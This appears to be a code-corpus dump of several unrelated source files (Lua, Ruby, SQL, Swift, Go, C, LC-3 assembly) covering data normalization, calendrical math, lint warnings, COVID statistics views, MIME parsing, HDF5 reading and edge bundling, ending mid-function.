-- Takes a standardized Tensor and multiples it by the STD.
-- It then adds the MEAN to each data point.
--
-- Destandardize Formula: (x * prevSTD) + prevMEAN
--
-- @tensor data A Torch Tensor containing data vectors.
-- @treturn tensor A destandardized tensor.
function rutil.destandardize(data)
local info = data:clone()
-- Standardization
if #info:size() > 1 then
for i=1, info:size()[#info:size()] do
info[{{},i}]:mul(STD[i])
info[{{},i}]:add(MEAN[i])
end
else
info:mul(STD)
info:add(MEAN)
end
return info
end
----------------------------------------------------------------------
-- Normalization based on Previous Data Vector
-- @section normalization-prev-data
----------------------------------------------------------------------
---
-- Returns all data points as the log of themselves
-- minus the log of their previous data point.
--
-- Subtractive Log Formula: ln(close_price[i]) - ln(close_price[i-1])
--
-- @tensor data A Torch Tensor containing data vectors.
-- @treturn tensor A normalized Torch tensor of the same type as data.
function rutil.log_prev(data)
local info = data:clone()
--Previous log minus
info = info:log()
for i=1, info:size()[1] - 1 do
info[i] = info[i] - info[i+1]
end
return info
end
---
-- Returns a Tensor with each point being subtracted
-- by the previous point and divided by the previous point.
--
-- Divisive Percent Formula: ((X[i] - X[i-1]) * 100)/X[i-1]
--
-- @tensor data A Torch Tensor containing data vectors.
-- @treturn tensor A normalized Torch tensor of the same type as data.
function rutil.percent_prev(data)
local info = data:clone()
--Previous percent
for i=1, info:size()[1] - 1 do
info[i] = (info[i] - info[i+1])/info[i+1]
end
return info
end
| 25.386473 | 75 | 0.559087 | 3.640625 |
abb91dc04859d56df64cca8558f1c74a23a34fe4 | 5,928 | rb | Ruby | lib/calendrical/base.rb | kipcole9/calendrical-ruby | e7e5693fa582c443ed3802fc8eed1dd98b59e9f3 | [
"MIT"
] | 1 | 2016-09-19T11:23:08.000Z | 2016-09-19T11:23:08.000Z | lib/calendrical/base.rb | kipcole9/calendrical-ruby | e7e5693fa582c443ed3802fc8eed1dd98b59e9f3 | [
"MIT"
] | null | null | null | lib/calendrical/base.rb | kipcole9/calendrical-ruby | e7e5693fa582c443ed3802fc8eed1dd98b59e9f3 | [
"MIT"
] | null | null | null | module Calendrical
class InvalidQuarter < StandardError; end
class InvalidMonth < StandardError; end
class InvalidWeek < StandardError; end
class InvalidDay< StandardError; end
class UnknownLunarPhase < StandardError; end
class DayError < StandardError; end
class MonthError < StandardError; end
class StartEnd < StandardError; end
class Proximity < StandardError; end
class Type < StandardError; end
class DanglingDays < StandardError; end
module Base
# see lines 249-252 in calendrica-3.0.cl
# m // n
# The following
# from operator import floordiv as quotient
# is not ok, the corresponding CL code
# uses CL 'floor' which always returns an integer
# (the floating point equivalent is 'ffloor'), while
# 'quotient' from operator module (or corresponding //)
# can return a float if at least one of the operands
# is a float...so I redefine it (and 'floor' and 'round' as well: in CL
# they always return an integer.)
#
# Ruby floor always returns an integer
def quotient(m, n)
(m / n).floor
end
# Add iround for compatibility with the CL and python code
def iround(x)
x.round
end
# m % n (this works as described in book for negative integres)
# It is interesting to note that
# mod(1.5, 1)
# returns the decimal part of 1.5, so 0.5; given a moment 'm'
# mod(m, 1)
# returns the time of the day
# Ruby mod behaves per the book
# from operator import mod
# see lines 254-257 in calendrica-3.0.cl
# Return the same as a % b with b instead of 0.
def amod(x, y)
y + (x % -y)
end
# see lines 502-510 in calendrica-3.0.cl
# Return those moments in list ell that occur in range 'range'.
def list_range(ell, range)
ell.select{|l| range.include?(l) }.compact
end
# see lines 482-485 in calendrica-3.0.cl
# Return the range data structure."""
def interval(t0, t1)
t0..t1
end
# see lines 259-264 in calendrica-3.0.cl
# Return first integer greater or equal to initial index, i,
# such that condition, p, holds.
def next_of(i, p)
x = i
while !p.call(x) do
x += 1
end
x
end
# see lines 266-271 in calendrica-3.0.cl
# Return last integer greater or equal to initial index, i,
# such that condition, p, holds.
def final_of(i, p)
if not p.call(i)
return i - 1
else
final_of(i+1, p)
end
end
# see lines 273-281 in calendrica-3.0.cl
# Return the sum of f(i) from i=k, k+1, ... till p(i) holds true or 0.
# This is a tail recursive implementation.
def summa(f, k, p)
if not p.call(k)
return 0
else
f.call(k) + summa(f, k+1, p)
end
end
# Return the sum of f(i) from i=k, k+1, ... till p(i) holds true or 0.
# This is an implementation of the Summation formula from Kahan,
# see Theorem 8 in Goldberg, David 'What Every Computer Scientist
# Should Know About Floating-Point Arithmetic', ACM Computer Survey,
# Vol. 23, No. 1, March 1991.
def altsumma(f, k, p)
if not p.call(k)
return 0
else
s = f.call(k)
c = 0
j = k + 1
while p.call(j) do
y = f.call(j) - c
t = s + y
c = (t - s) - y
s = t
j += 1
end
end
return s
end
# see lines 283-293 in calendrica-3.0.cl
# Bisection search for x in [lo, hi] such that condition 'e' holds.
# p determines when to go left.
def binary_search(lo, hi, p, e)
x = (lo + hi) / 2
if p.call(lo, hi)
return x
elsif e.call(x)
return binary_search(lo, x, p, e)
else
return binary_search(x, hi, p, e)
end
end
# see lines 295-302 in calendrica-3.0.cl
# Find inverse of angular function 'f' at 'y' within interval [a,b].
# Default precision is 0.00001
def invert_angular(f, y, a, b, prec = 10**-5)
binary_search(a, b,
lambda{|l, h| ((h - l) <= prec)},
lambda{|x| ((f.call(x) - y) % 360) < 180}
)
end
#def invert_angular(f, y, a, b):
# from scipy.optimize import brentq
# return(brentq((lambda x: mod(f(x) - y), 360)), a, b, xtol=error)
# see lines 304-313 in calendrica-3.0.cl
# Return the sum of body 'b' for indices i1..in
# running simultaneously thru lists l1..ln.
# List 'l' is of the form [[i1 l1]..[in ln]]
def sigma(l, b)
# 'l' is a list of 'n' lists of the same lenght 'L' [l1, l2, l3, ...]
# 'b' is a lambda with 'n' args
# 'sigma' sums all 'L' applications of 'b' to the relevant tuple of args
# >>> a = [ 1, 2, 3, 4]
# >>> b = [ 5, 6, 7, 8]
# >>> c = [ 9,10,11,12]
# >>> l = [a,b,c]
# >>> z = zip(*l)
# >>> z
# [(1, 5, 9), (2, 6, 10), (3, 7, 11), (4, 8, 12)]
# >>> b = lambda x, y, z: x * y * z
# >>> b(*z[0]) # apply b to first elem of i
# 45
# >>> temp = []
# >>> z = zip(*l)
# >>> for e in z: temp.append(b(*e))
# >>> temp
# [45, 120, 231, 384]
# >>> from operator import add
# >>> reduce(add, temp)
# 780
# return sum(b(*e) for e in zip(*l))
# puts "Zipped: #{l.first.zip(*l[1..-1]).map{|x| b.call(*x)}}"
l.first.zip(*l[1..-1]).map{|x| b.call(*x)}.reduce(:+)
end
# see lines 315-321 in calendrica-3.0.cl
# Calculate polynomial with coefficients 'a' at point x.
# The polynomial is a[0] + a[1] * x + a[2] * x^2 + ...a[n-1]x^(n-1)
# the result is
# a[0] + x(a[1] + x(a[2] +...+ x(a[n-1])...)
def poly(x, a)
# This implementation is also known as Horner's Rule.
n = a.length - 1
p = a[n]
for i in 1..n do
p = p * x + a[n-i]
end
p
end
end
end | 30.244898 | 78 | 0.550776 | 3.25 |
42cc0ac1546cae4ebc687ac3254e52adae4e8ef0 | 1,792 | lua | Lua | src/luacheck/check_state.lua | srinivas32/luacheck | 7ab26494a4a0f41c6f96e85fda846045429e3326 | [
"MIT"
] | 1,641 | 2015-01-03T18:57:09.000Z | 2022-03-30T22:08:29.000Z | src/luacheck/check_state.lua | srinivas32/luacheck | 7ab26494a4a0f41c6f96e85fda846045429e3326 | [
"MIT"
] | 206 | 2015-01-05T09:22:24.000Z | 2022-03-10T03:33:54.000Z | src/luacheck/check_state.lua | srinivas32/luacheck | 7ab26494a4a0f41c6f96e85fda846045429e3326 | [
"MIT"
] | 299 | 2015-01-07T02:08:52.000Z | 2022-03-27T10:26:47.000Z | local utils = require "luacheck.utils"
local check_state = {}
local CheckState = utils.class()
function CheckState:__init(source_bytes)
self.source_bytes = source_bytes
self.warnings = {}
end
-- Returns column of a character in a line given its offset.
-- The column is never larger than the line length.
-- This can be called if line length is not yet known.
function CheckState:offset_to_column(line, offset)
local line_length = self.line_lengths[line]
local column = offset - self.line_offsets[line] + 1
if not line_length then
return column
end
return math.max(1, math.min(line_length, column))
end
function CheckState:warn_column_range(code, range, warning)
warning = warning or {}
warning.code = code
warning.line = range.line
warning.column = range.column
warning.end_column = range.end_column
table.insert(self.warnings, warning)
return warning
end
function CheckState:warn(code, line, offset, end_offset, warning)
warning = warning or {}
warning.code = code
warning.line = line
warning.column = self:offset_to_column(line, offset)
warning.end_column = self:offset_to_column(line, end_offset)
table.insert(self.warnings, warning)
return warning
end
function CheckState:warn_range(code, range, warning)
return self:warn(code, range.line, range.offset, range.end_offset, warning)
end
function CheckState:warn_var(code, var, warning)
warning = self:warn_range(code, var.node, warning)
warning.name = var.name
return warning
end
function CheckState:warn_value(code, value, warning)
warning = self:warn_range(code, value.var_node, warning)
warning.name = value.var.name
return warning
end
function check_state.new(source_bytes)
return CheckState(source_bytes)
end
return check_state
| 26.746269 | 78 | 0.748884 | 3.390625 |
962a8dc6e1a9a3cddabcba9d35fc5a6ceaac1001 | 3,118 | sql | SQL | hasura/migrations/1597267956798_window_views/up.sql | wbez/il-covid19-api | 1d0b89ec2b104af804ee203b5d83400d2a97d1ed | [
"MIT"
] | null | null | null | hasura/migrations/1597267956798_window_views/up.sql | wbez/il-covid19-api | 1d0b89ec2b104af804ee203b5d83400d2a97d1ed | [
"MIT"
] | 12 | 2020-07-28T16:50:16.000Z | 2020-10-16T16:23:16.000Z | hasura/migrations/1597267956798_window_views/up.sql | wbez/il-covid19-api | 1d0b89ec2b104af804ee203b5d83400d2a97d1ed | [
"MIT"
] | 3 | 2020-07-31T21:20:30.000Z | 2021-07-15T13:33:24.000Z | CREATE MATERIALIZED VIEW public.state_testing_results_change
AS
SELECT
date,
total_tested,
total_tested - lag(total_tested) OVER (ORDER BY date) AS total_tested_change,
round(
(
(total_tested - lag(total_tested) OVER (ORDER BY date))::numeric / lag(total_tested) OVER (ORDER BY date)
) * 100,
2
) AS total_tested_change_pct,
confirmed_cases,
confirmed_cases - lag(confirmed_cases) OVER (ORDER BY date) AS confirmed_cases_change,
round(
(
(confirmed_cases - lag(confirmed_cases) OVER (ORDER BY date))::numeric / lag(confirmed_cases) OVER (ORDER BY date)
) * 100,
2
) AS confirmed_cases_change_pct,
confirmed_cases - deaths AS confirmed_cases_minus_deaths,
deaths,
deaths - lag(deaths) OVER (ORDER BY date) AS deaths_change,
CASE
WHEN lag(deaths) OVER (ORDER BY date) = 0
THEN 0::numeric
ELSE round(
(
(deaths - lag(deaths) OVER (ORDER BY date))::numeric / lag(deaths) OVER (ORDER BY date)
) * 100,
2
)
END
AS deaths_change_pct
FROM public.state_testing_results
GROUP BY date, total_tested, confirmed_cases, deaths
ORDER BY date DESC;
CREATE MATERIALIZED VIEW public.county_testing_results_change
AS
SELECT
date,
county,
census_geography_id,
total_tested,
total_tested - lag(total_tested) OVER (PARTITION BY county ORDER BY date) AS total_tested_change,
CASE
WHEN lag(total_tested) OVER (PARTITION BY county ORDER BY date) = 0
THEN 0::numeric
ELSE round(
(
(total_tested - lag(total_tested) OVER (PARTITION BY county ORDER BY date))::numeric / lag(total_tested) OVER (PARTITION BY county ORDER BY date)
) * 100,
2
)
END
AS total_tested_change_pct,
confirmed_cases,
confirmed_cases - lag(confirmed_cases) OVER (PARTITION BY county ORDER BY date) AS confirmed_cases_change,
CASE
WHEN lag(confirmed_cases) OVER (PARTITION BY county ORDER BY date) = 0
THEN 0::numeric
ELSE round(
(
(confirmed_cases - lag(confirmed_cases) OVER (PARTITION BY county ORDER BY date))::numeric / lag(confirmed_cases) OVER (PARTITION BY county ORDER BY date)
) * 100,
2
)
END
AS confirmed_cases_change_pct,
confirmed_cases - deaths AS confirmed_cases_minus_deaths,
deaths,
deaths - lag(deaths) OVER (PARTITION BY county ORDER BY date) AS deaths_change,
CASE
WHEN lag(deaths) OVER (PARTITION BY county ORDER BY date) = 0
THEN 0::numeric
ELSE round(
(
(deaths - lag(deaths) OVER (PARTITION BY county ORDER BY date))::numeric / lag(deaths) OVER (PARTITION BY county ORDER BY date)
) * 100,
2
)
END
AS deaths_change_pct
FROM public.county_testing_results
GROUP BY date, county, census_geography_id, total_tested, confirmed_cases, deaths
ORDER BY date DESC;
| 35.431818 | 170 | 0.63406 | 3.265625 |
cb8c1143da35971ebc1b2488297e747858737071 | 1,079 | swift | Swift | Tests/BowLaws/MonadStateLaws.swift | Dragna/bow | 8cd19a4fd84463b53ce1b0772bec96d84f9f5007 | [
"Apache-2.0"
] | null | null | null | Tests/BowLaws/MonadStateLaws.swift | Dragna/bow | 8cd19a4fd84463b53ce1b0772bec96d84f9f5007 | [
"Apache-2.0"
] | null | null | null | Tests/BowLaws/MonadStateLaws.swift | Dragna/bow | 8cd19a4fd84463b53ce1b0772bec96d84f9f5007 | [
"Apache-2.0"
] | null | null | null | import Foundation
import SwiftCheck
@testable import Bow
class MonadStateLaws<F: MonadState & EquatableK> where F.S == Int {
static func check() {
getIdempotent()
setTwice()
setGet()
getSet()
}
private static func getIdempotent() {
property("Idempotence") <- forAll { (_: Int) in
return F.flatMap(F.get(), { _ in F.get() }) == F.get()
}
}
private static func setTwice() {
property("Set twice is equivalent to set only the second") <- forAll { (s: Int, t: Int) in
return isEqual(F.flatMap(F.set(s), { _ in F.set(t) }), F.set(t))
}
}
private static func setGet() {
property("Get after set retrieves the original value") <- forAll { (s: Int) in
return F.flatMap(F.set(s), { _ in F.get() }) == F.flatMap(F.set(s), { _ in F.pure(s) })
}
}
private static func getSet() {
property("Get set") <- forAll { (_: Int) in
return isEqual(F.flatMap(F.get(), F.set), F.pure(()))
}
}
}
| 28.394737 | 99 | 0.531047 | 3.21875 |
a13b4c76945bcf9c9e5830aae8366268e006c06b | 6,588 | go | Go | part.go | cinience/go.enmime | 3702bd9092afd46a33a80af5bec693960b583418 | [
"MIT"
] | null | null | null | part.go | cinience/go.enmime | 3702bd9092afd46a33a80af5bec693960b583418 | [
"MIT"
] | null | null | null | part.go | cinience/go.enmime | 3702bd9092afd46a33a80af5bec693960b583418 | [
"MIT"
] | null | null | null | package enmime
import (
"bufio"
"bytes"
"encoding/base64"
"fmt"
"io"
"mime"
"mime/multipart"
"net/textproto"
"strings"
"github.com/sloonz/go-qprintable"
)
// MIMEPart is the primary interface enmine clients will use. Each MIMEPart represents
// a node in the MIME multipart tree. The Content-Type, Disposition and File Name are
// parsed out of the header for easier access.
//
// TODO Content should probably be a reader so that it does not need to be stored in
// memory.
type MIMEPart interface {
Parent() MIMEPart // Parent of this part (can be nil)
FirstChild() MIMEPart // First (top most) child of this part
NextSibling() MIMEPart // Next sibling of this part
Header() textproto.MIMEHeader // Header as parsed by textproto package
ContentType() string // Content-Type header without parameters
Disposition() string // Content-Disposition header without parameters
FileName() string // File Name from disposition or type header
Charset() string // Content Charset
Content() []byte // Decoded content of this part (can be empty)
}
// memMIMEPart is an in-memory implementation of the MIMEPart interface. It will likely
// choke on huge attachments.
type memMIMEPart struct {
parent MIMEPart
firstChild MIMEPart
nextSibling MIMEPart
header textproto.MIMEHeader
contentType string
disposition string
fileName string
charset string
content []byte
}
// NewMIMEPart creates a new memMIMEPart object. It does not update the parents FirstChild
// attribute.
func NewMIMEPart(parent MIMEPart, contentType string) *memMIMEPart {
return &memMIMEPart{parent: parent, contentType: contentType}
}
// Parent of this part (can be nil)
func (p *memMIMEPart) Parent() MIMEPart {
return p.parent
}
// First (top most) child of this part
func (p *memMIMEPart) FirstChild() MIMEPart {
return p.firstChild
}
// Next sibling of this part
func (p *memMIMEPart) NextSibling() MIMEPart {
return p.nextSibling
}
// Header as parsed by textproto package
func (p *memMIMEPart) Header() textproto.MIMEHeader {
return p.header
}
// Content-Type header without parameters
func (p *memMIMEPart) ContentType() string {
return p.contentType
}
// Content-Disposition header without parameters
func (p *memMIMEPart) Disposition() string {
return p.disposition
}
// File Name from disposition or type header
func (p *memMIMEPart) FileName() string {
return p.fileName
}
// Content charset
func (p *memMIMEPart) Charset() string {
return p.charset
}
// Decoded content of this part (can be empty)
func (p *memMIMEPart) Content() []byte {
return p.content
}
// ParseMIME reads a MIME document from the provided reader and parses it into
// tree of MIMEPart objects.
func ParseMIME(reader *bufio.Reader) (MIMEPart, error) {
tr := textproto.NewReader(reader)
header, err := tr.ReadMIMEHeader()
if err != nil {
return nil, err
}
mediatype, params, err := mime.ParseMediaType(header.Get("Content-Type"))
if err != nil {
return nil, err
}
root := &memMIMEPart{header: header, contentType: mediatype}
if strings.HasPrefix(mediatype, "multipart/") {
boundary := params["boundary"]
err = parseParts(root, reader, boundary)
if err != nil {
return nil, err
}
} else {
// Content is text or data, decode it
content, err := decodeSection(header.Get("Content-Transfer-Encoding"), reader)
if err != nil {
return nil, err
}
root.content = content
}
return root, nil
}
// parseParts recursively parses a mime multipart document.
func parseParts(parent *memMIMEPart, reader io.Reader, boundary string) error {
var prevSibling *memMIMEPart
// Loop over MIME parts
mr := multipart.NewReader(reader, boundary)
for {
// mrp is golang's built in mime-part
mrp, err := mr.NextPart()
if err != nil {
if err == io.EOF {
// This is a clean end-of-message signal
break
}
return err
}
if len(mrp.Header) == 0 {
// Empty header probably means the part didn't using the correct trailing "--"
// syntax to close its boundary. We will let this slide if this this the
// last MIME part.
if _, err := mr.NextPart(); err != nil {
if err == io.EOF || strings.HasSuffix(err.Error(), "EOF") {
// This is what we were hoping for
break
} else {
return fmt.Errorf("Error at boundary %v: %v", boundary, err)
}
}
return fmt.Errorf("Empty header at boundary %v", boundary)
}
ctype := mrp.Header.Get("Content-Type")
if ctype == "" {
return fmt.Errorf("Missing Content-Type at boundary %v", boundary)
}
mediatype, mparams, err := mime.ParseMediaType(ctype)
if err != nil {
return err
}
// Insert ourselves into tree, p is enmime's mime-part
p := NewMIMEPart(parent, mediatype)
p.header = mrp.Header
if prevSibling != nil {
prevSibling.nextSibling = p
} else {
parent.firstChild = p
}
prevSibling = p
// Figure out our disposition, filename
disposition, dparams, err := mime.ParseMediaType(mrp.Header.Get("Content-Disposition"))
if err == nil {
// Disposition is optional
p.disposition = disposition
p.fileName = DecodeHeader(dparams["filename"])
}
if p.fileName == "" && mparams["name"] != "" {
p.fileName = DecodeHeader(mparams["name"])
}
if p.fileName == "" && mparams["file"] != "" {
p.fileName = DecodeHeader(mparams["file"])
}
if p.charset == "" {
p.charset = mparams["charset"]
}
boundary := mparams["boundary"]
if boundary != "" {
// Content is another multipart
err = parseParts(p, mrp, boundary)
if err != nil {
return err
}
} else {
// Content is text or data, decode it
data, err := decodeSection(mrp.Header.Get("Content-Transfer-Encoding"), mrp)
if err != nil {
return err
}
p.content = data
}
}
return nil
}
// decodeSection attempts to decode the data from reader using the algorithm listed in
// the Content-Transfer-Encoding header, returning the raw data if it does not known
// the encoding type.
func decodeSection(encoding string, reader io.Reader) ([]byte, error) {
// Default is to just read input into bytes
decoder := reader
switch strings.ToLower(encoding) {
case "quoted-printable":
decoder = qprintable.NewDecoder(qprintable.WindowsTextEncoding, reader)
case "base64":
cleaner := NewBase64Cleaner(reader)
decoder = base64.NewDecoder(base64.StdEncoding, cleaner)
}
// Read bytes into buffer
buf := new(bytes.Buffer)
_, err := buf.ReadFrom(decoder)
if err != nil {
return nil, err
}
return buf.Bytes(), nil
}
| 27.22314 | 91 | 0.686703 | 3.125 |
5b3c51498621ede0a2e5fe424027b2d0f6bb763b | 4,270 | c | C | io/read_hdf5.c | Andrei-EPFL/FCFC | fdf69fc5d6b24bdd7fff2bcdf8998c6ecacabdd6 | [
"MIT"
] | null | null | null | io/read_hdf5.c | Andrei-EPFL/FCFC | fdf69fc5d6b24bdd7fff2bcdf8998c6ecacabdd6 | [
"MIT"
] | null | null | null | io/read_hdf5.c | Andrei-EPFL/FCFC | fdf69fc5d6b24bdd7fff2bcdf8998c6ecacabdd6 | [
"MIT"
] | null | null | null | #include "read_file.h"
#include "libast.h"
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>
#include <ctype.h>
#include "hdf5.h"
static int read_col(hid_t group_id, char const *pos, real **data, hsize_t *num) {
const int ndims = 1;//H5Sget_simple_extent_ndims(data_space);
hsize_t dims[ndims];
hid_t dataset_id = 0, data_space = 0; /* identifiers */
/* Open an existing dataset. */
if (!(dataset_id = H5Dopen(group_id, pos, H5P_DEFAULT))) {
P_ERR("failed to open the dataset of column %s\n", pos);
//CLEAN_PTR;
return 1;
}
/* Get the dataspace of the dataset_id */
if (!(data_space = H5Dget_space(dataset_id))) {
P_ERR("Failed to get the data_space from the dataset of column %s\n", pos);
//CLEAN_PTR;
return 1;
}
if (H5Sget_simple_extent_dims(data_space, dims, NULL) < 0) {
P_ERR("There are no dimensions in the dataset\n");
//CLEAN_PTR;
return 1;
}
*num = dims[0];
if (!(*data = malloc(sizeof(real) * dims[0]))) {
P_ERR("failed to allocate memory the column\n");
return 1;
}
/* Read the dataset. */
if (H5Dread(dataset_id, H5T_REAL, H5S_ALL, H5S_ALL, H5P_DEFAULT, *data) < 0) {
P_ERR("failed to read from the dataset of column %s\n", pos);
return 1;
}
/* Close the dataset. */
if (H5Dclose(dataset_id) < 0) {
P_ERR("failed to close the dataset of column %s\n", pos);
return 1;
}
return 0;
}
int read_hdf5_data(const char *fname, const char *groupname, char *const *pos, const char *wt, const char *sel,
DATA **data, size_t *num, const int verb) {
hid_t file_id = 0, group_id = 0;
DATA *tmp;
real *datax = NULL, *datay = NULL, *dataz = NULL;
hsize_t dimx, dimy, dimz;
size_t index = 0;
/* Open an existing file. */
if (!(file_id = H5Fopen(fname, H5F_ACC_RDONLY, H5P_DEFAULT))) {
P_ERR("Failed to open the HDF5 file %s\n", fname);
//CLEAN_PTR;
return FCFC_ERR_FILE;
}
/* Open an existing group. */
if (!(group_id = H5Gopen(file_id, groupname, H5P_DEFAULT))) {
P_ERR("failed to open the group %s\n", groupname);
//CLEAN_PTR;
return FCFC_ERR_FILE;
}
/* Read the columns */
if (read_col(group_id, pos[0], &datax, &dimx)) {
P_ERR("failed to read the column %s\n", pos[0]);
return 1;
}
if (read_col(group_id, pos[1], &datay, &dimy)) {
P_ERR("failed to read the column %s\n", pos[1]);
return 1;
}
if (read_col(group_id, pos[2], &dataz, &dimz)) {
P_ERR("failed to read the column %s\n", pos[2]);
return 1;
}
/* Check dimensions of the columns */
if ((dimx != dimy) || (dimy != dimz) || (dimz != dimx)) {
P_ERR("the sizes of the columns are not compatible\n");
return 1;
}
/* Allocate memory for data, a tmp variable */
if (!(tmp = malloc(dimx * sizeof(DATA)))) {
P_ERR("failed to allocate memory for the data\n");
//CLEAN_PTR;
return FCFC_ERR_MEMORY;
}
*num = dimx;
#ifdef OMP
#pragma omp parallel for
#endif
for (index = 0; index < dimx; index ++) {
tmp[index].x[0] = datax[index];
tmp[index].x[1] = datay[index];
tmp[index].x[2] = dataz[index];
}
#ifdef FCFC_DATA_WEIGHT
real *weight = NULL;
hsize_t dimw;
if (wt) {
if (read_col(group_id, wt, &weight, &dimw)) {
P_ERR("failed to read the column %s\n", pos[2]);
return 1;
}
}
if (weight && (dimx == dimw)) {
#ifdef OMP
#pragma omp parallel for
#endif
for (index = 0; index < dimx; index ++) {
tmp[index].w = weight[index];
}
}
else {
#ifdef OMP
#pragma omp parallel for
#endif
for (index = 0; index < dimx; index ++) {
tmp[index].w = 1;
}
}
#endif
*data = tmp;
/* Close the group. */
if (H5Gclose(group_id) < 0) {
P_ERR("failed to close the group of the HDF5 file\n");
}
/* Close the file. */
if (H5Fclose(file_id) < 0) {
P_ERR("failed to close the HDF5 file\n");
}
return 0;
} | 26.855346 | 111 | 0.559016 | 3.015625 |
a243c32bd2afc2eeb277de62059676cf64718f4d | 4,218 | asm | Assembly | Labs/Lab6/lab06_ex1.asm | ptr2578/CS61 | 682dccd6b986f383120a4612eb7e7a2d1e3cfa3f | [
"BSD-3-Clause"
] | 1 | 2019-01-01T23:31:22.000Z | 2019-01-01T23:31:22.000Z | Labs/Lab6/lab06_ex1.asm | ptr2578/CS61 | 682dccd6b986f383120a4612eb7e7a2d1e3cfa3f | [
"BSD-3-Clause"
] | null | null | null | Labs/Lab6/lab06_ex1.asm | ptr2578/CS61 | 682dccd6b986f383120a4612eb7e7a2d1e3cfa3f | [
"BSD-3-Clause"
] | null | null | null | ;=================================================
; Name: Sungho Ahn
; Email: [email protected]
; GitHub username: ptr2578
;
; Lab: lab 6
; Lab section: B21
; TA: Jason Goulding
;=================================================
.ORIG x3000
;--------------
; Instructions
;--------------
LD R1, ARRAY_PTR ; Load address of Array into R1
ADD R0, R0, #1 ; Put number 1 in R0
ADD R3, R3, #10 ; R3 used for loop counter
;-------------
; CODE BEGINS
;-------------
InputLoop ; BRANCH InputLoop/ Loop begins
STR R0, R1, #0 ; Stores the number in R0 into the array
ADD R0, R0, R0 ; Multiply the value in R0 by 2 (2^n)
ADD R1, R1, #1 ; Move to next data slot
ADD R3, R3, #-1 ; Decrement the loop counter
BRz InputLoopEnd ; If counter becomes 0, out the loop
BR InputLoop ; Back to top of the loop
InputLoopEnd ; BRANCH InputLoopEnd
;---------------------------------------------------------------------------
AND R1, R1, #0 ; Clear R1 for next use
ADD R1, R1, #1 ; R1 holds number 1 for comparison purpose
ADD R3, R3, #10 ; Loop counter for array loop
LD R6, ARRAY_PTR ; Load the address of the array into R6
ArrayLoop ; BRANCH ArrayLoop / Loop begins
LDR R2, R6, #0 ; Load direct the value of the array into R2
AND R4, R4, #0 ; Loop counter for Hex loop
AND R0, R0, #0 ; Clear R0 for next use
LD R0, Printb ; Load R0 with b
OUT ; Print character b
HexLoop ; BRANCH HexLoop
ADD R4, R4, #1 ; Increment hex-loop counter by 1 every loop
AND R0, R0, #0 ; Clear R0 for next use
JSR SUB_PRINT_16BINARY ; Jump to subroutine SUB_PRINT_16BINARY
SpaceLoop ; BRANCH SpaceLoop
AND R5, R5, #0 ; Clear R5 for next use
ADD R5, R4, #-4 ; Check to see if the loop is 4th count
BRz isSpace ; Go to isSpace to print space out if sum = 0
ADD R5, R4, #-8 ; Check to see if the loop is 8th count
BRz isSpace ; Go to isSpace to print space out if sum = 0
ADD R5, R4, #-12 ; Check to see if the loop is 12th count
BRz isSpace ; Go to isSpace to print space out if sum = 0
BR HexLoopCheck ; Skip to BRANCH LoopCheck
isSpace ; BRANCH isSpace
AND R0, R0, #0 ; Clear R0 for next use
LD R0, PrintSpace ; Load space character in R0
OUT ; Prints space
HexLoopCheck ; BRANCH LoopCheck
AND R0, R0, #0 ; Clear R0 for next use
ADD R0, R4, #-16 ; Loop continues until counter becomes zero
BRz HexLoopEnd
BR HexLoop
HexLoopEnd ; BRANCH HexLoopEnd
AND R0, R0, #0 ; Clear R0 for next use
LEA R0, NEWLINE ; Load new line in R0
PUTS ; Prints new line
ADD R6, R6, #1 ; Move to the next data in the array
ADD R3, R3, #-1 ; Decrement the array-Loop counter
BRz ArrayLoopEnd ; Out the array-loop if zero
BR ArrayLoop ; Back to the top of the array-loop if positive
ArrayLoopEnd ; BRANCH ArrayLoopEnd
HALT
;------
; Data
;------
ARRAY_PTR .FILL x4000 ; Address of the array
Printb .FILL x0062 ; ASCII character b
PrintSpace .FILL x0020 ; Space
NEWLINE .STRINGZ "\n" ; New line
;-------------
; Remote data
;-------------
.ORIG x4000
ARRAY .BLKW #10 ; Array with 10 values
;---------------------------------------------------------
; Subroutine: PRINT_16BINARY
; Parameter: R0, R2
; Postcondition: The subroutine will take MSB and compare
; with 1 and print its bin value. 0 or 1
; Return value: None
;---------------------------------------------------------
.ORIG x3200
SUB_PRINT_16BINARY ; BRANCH SUB_PRINT_16BINARY
ST R7, BACKUP_R7_3200 ; Backup R7
ADD R0, R2, R1 ; Compare MSB with 1
BRnz isOne ; If MSB is 1, go to branch isOne
isZero ; BRANCH isZero
AND R0, R0, #0 ; Clear R0 for next use
LD R0, PrintZero ; Load R0 with 0
OUT ; Prints zero
ADD R2, R2, R2 ; Shift bits left
BR EndSubroutine ; Skip to SpaceLoop
isOne ; BRANCH isOne
AND R0, R0, #0 ; Clear R0 for next use
LD R0, PrintOne ; Load R0 with 1
OUT ; Prints one
ADD R2, R2, R2 ; Shift bits left
EndSubroutine ; BRANCH EndSubroutine
LD R7, BACKUP_R7_3200 ; Restore R7
RET ; Return to address R7
;-----------------
; Subroutine Data
;-----------------
BACKUP_R7_3200 .BLKW #1
PrintZero .FILL x0030 ; ASCII character 0
PrintOne .FILL x0031 ; ASCII character 1
;----------------
; END of Program
;----------------
.END | 29.089655 | 76 | 0.613798 | 3.421875 |
502c0aad13ef2fe5f62da67fe6ccdec547ae174b | 3,192 | go | Go | go/src/fblib/edge.go | dominichamon/force-bundles | 3bc542ef7d471a3541f58e9458473d5b0e3839fd | [
"Apache-2.0"
] | null | null | null | go/src/fblib/edge.go | dominichamon/force-bundles | 3bc542ef7d471a3541f58e9458473d5b0e3839fd | [
"Apache-2.0"
] | null | null | null | go/src/fblib/edge.go | dominichamon/force-bundles | 3bc542ef7d471a3541f58e9458473d5b0e3839fd | [
"Apache-2.0"
] | 1 | 2020-11-15T20:12:29.000Z | 2020-11-15T20:12:29.000Z | package fblib
import (
"fmt"
"math"
)
const (
K = 0.01
)
type Edge struct {
forces []Vector
velocities []Vector
vertices []Point
}
func NewEdge(p0, p1 Point) *Edge {
return &Edge{forces: []Vector{}, velocities: []Vector{}, vertices: []Point{p0, p1},}
}
func (e *Edge) compatibility(q Edge) float64 {
delta_p := e.vertices[len(e.vertices)-1].Sub(e.vertices[0])
delta_q := q.vertices[len(q.vertices)-1].Sub(q.vertices[0])
len_p := delta_p.Length()
len_q := delta_q.Length()
// angle
Ca := math.Abs(delta_p.Dot(delta_q) / (len_p * len_q))
// scale
len_avg := (len_p + len_q) / 2.0
Cs := 2.0 / (len_avg*math.Min(len_p, len_q) + math.Max(len_p, len_q)/len_avg)
// position
mid_p := e.vertices[len(e.vertices)/2]
